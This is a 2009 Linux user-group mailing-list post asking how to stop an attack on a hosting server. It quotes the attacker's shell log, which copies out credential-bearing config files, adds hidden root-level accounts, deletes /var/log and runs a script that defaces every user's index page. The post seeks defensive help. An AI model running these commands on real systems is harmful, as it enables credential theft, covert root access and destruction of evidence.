[GLLUG] server attack

Eduardo Cesconetto eduardo at cesconetto.com
Sun Sep 20 20:31:51 EDT 2009


The idea to stop this is to disable mass.pl from accessing ssh, right?
Disabling perl would basically kill the server's main functions, so
it's not an option.


On Sep 20, 2009, at 7:28 PM, Eduardo Cesconetto wrote:

> A friend's hosting server is being attacked by somebody using mass.pl
> to change the index.html files in all the user folders, here is part
> of a log:
>
> cd ..
> cat /home/*/public_html/configuration.php > hard.txt
> useradd -o -u 0 sshdd
> /usr/sbin/useradd -o -u 0 sshdd
> passwd sshdd
> /usr/sbin/useradd -o -u 0 apachee
> passwd apachee
> /usr/sbin/useradd -o -u 0 apach
> passwd apach
> /etc/init.d/sshd restart
> /etc/init.d/sshd stop
> /etc/init.d/sshd start
> rm hard.txt
> cat /home/*/public_html/config.php > hard.txt
> ls -lia
> rm hard.txt
> cd ..
> cat /home/*/public_html/config.php > hard.txt
> rm hard.txt
> cat /home/*/public_html/configuration.php > hard.txt
> rm hard.txt
> cat /home/*/public_html/wp-config.php > hard.txt
> rm hard.txt
> ls -lia /etc
> ls /etc/valiases > hard.txt
> rm hard.txt
> ls -lia /etc/valiases > hard.txt
> ls -lia /
> rm -r var/log
> rm -r /var/log
> mkdir /var/log
> ls -lia
> crm user1
> rm user1.php
> cd cgi-bin
> ls -lia
> rm -r hard
> cd ..
> rm hard
> cd cgi-bin
> cd ..
> rm hard.txt
> cd cgi-bin
> ls -lia
> pwd
> perl mass.pl
> perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/hard.html
> perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/hard.html
> perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/hard.html
> [9/20/09 7:13:55 PM] konrath: I found this up above
>
>
>
> any ideas on how to stop this?
>
>
> _______________________________________________
> linux-user mailing list
> linux-user at egr.msu.edu
> http://mailman.egr.msu.edu/mailman/listinfo/linux-user


